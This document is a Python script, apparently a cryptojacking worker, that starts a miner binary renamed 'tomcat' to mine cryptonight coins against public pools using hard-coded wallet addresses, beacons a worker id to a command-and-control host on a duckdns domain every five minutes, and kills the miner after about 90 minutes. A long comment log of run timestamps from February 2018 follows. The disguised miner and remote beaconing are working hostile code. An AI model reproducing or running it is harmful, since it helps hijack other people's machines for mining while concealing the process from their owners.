import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:12:06.243594
#2018-02-17 15:58:05.198411
#2018-02-17 17:45:06.128367
#2018-02-17 19:33:04.952141
#2018-02-17 21:21:06.663734
#2018-02-17 23:05:06.615131
#2018-02-18 00:52:06.270722
#2018-02-18 02:40:06.810651
#2018-02-18 04:28:01.767052
#2018-02-18 06:19:05.918591
#2018-02-18 08:09:02.086975
#2018-02-18 09:56:05.053722
#2018-02-18 11:44:03.500568
#2018-02-18 13:29:01.630949
#2018-02-18 15:19:07.056468
#2018-02-18 17:08:01.620335
#2018-02-18 18:56:01.697804
#2018-02-18 20:42:06.263333
#2018-02-18 22:28:01.805037
#2018-02-19 00:17:01.291623
#2018-02-19 02:03:02.162803
#2018-02-19 03:50:09.106608
#2018-02-19 05:36:07.388453
#2018-02-19 07:25:06.502849
#2018-02-19 09:15:01.746338
#2018-02-19 11:04:07.074934
#2018-02-19 12:51:07.996747
#2018-02-19 14:39:01.600741
#2018-02-19 16:26:08.212139
#2018-02-19 18:14:06.872570
#2018-02-19 20:01:08.156840
#2018-02-19 21:50:09.178255
#2018-02-19 23:36:08.403985
#2018-02-20 01:21:05.384957
#2018-02-20 03:10:09.020332
#2018-02-20 04:58:05.691107
#2018-02-20 06:41:08.103244
#2018-02-20 08:27:01.939887
#2018-02-20 10:11:07.928108
#2018-02-20 11:55:02.084030
#2018-02-20 13:42:08.895157
#2018-02-20 15:26:07.649911
#2018-02-20 17:11:02.110723
#2018-02-20 18:59:05.630832
#2018-02-20 20:48:02.039139
#2018-02-20 22:32:01.736413
#2018-02-21 00:13:06.339914
#2018-02-21 02:01:01.647408
#2018-02-21 03:48:06.465572
#2018-02-21 05:36:07.926411
#2018-02-21 07:24:17.067693
#2018-02-21 09:09:09.114807
#2018-02-21 10:58:01.360916
#2018-02-21 12:46:09.544730
#2018-02-21 14:35:04.071069
#2018-02-21 16:22:04.066383
#2018-02-21 18:12:06.908248
#2018-02-21 19:57:06.499089
#2018-02-21 21:44:03.899851
#2018-02-21 23:32:07.551267
#2018-02-22 01:19:03.966245
#2018-02-22 03:08:06.329052
#2018-02-22 04:53:01.602588
#2018-02-22 06:38:06.568775
#2018-02-22 08:26:05.434495
#2018-02-22 10:13:02.055086
#2018-02-22 11:59:01.475253
#2018-02-22 13:44:08.651452
#2018-02-22 15:34:06.241981
#2018-02-22 17:19:09.443522
#2018-02-22 19:07:09.290461
#2018-02-22 21:01:07.438013
#2018-02-22 22:47:04.518553
#2018-02-23 00:35:04.257161
#2018-02-23 02:21:04.529952
#2018-02-23 04:11:04.820116
#2018-02-23 05:56:01.894489
#2018-02-23 07:38:07.317217
#2018-02-23 09:41:04.757847
#2018-02-23 11:47:07.430588
#2018-02-23 13:36:01.221534
#2018-02-23 15:23:04.991371
#2018-02-23 17:10:05.102042
#2018-02-23 18:55:07.831809
#2018-02-23 20:41:07.655648
#2018-02-23 22:26:06.213233
#2018-02-24 00:11:03.809627
#2018-02-24 02:02:07.134689
#2018-02-24 03:52:05.081489
#2018-02-24 05:38:05.883474
#2018-02-24 07:26:05.362228
#2018-02-24 09:14:06.872508
#2018-02-24 11:04:04.287504
#2018-02-24 12:52:01.954718
#2018-02-24 14:40:01.692456
#2018-02-24 16:32:07.675481
#2018-02-24 18:23:04.208599
#2018-02-24 20:09:07.070196
#2018-02-24 21:53:07.042846
#2018-02-25 02:03:06.511629
#2018-02-25 06:01:06.631228
#2018-02-25 11:39:01.925528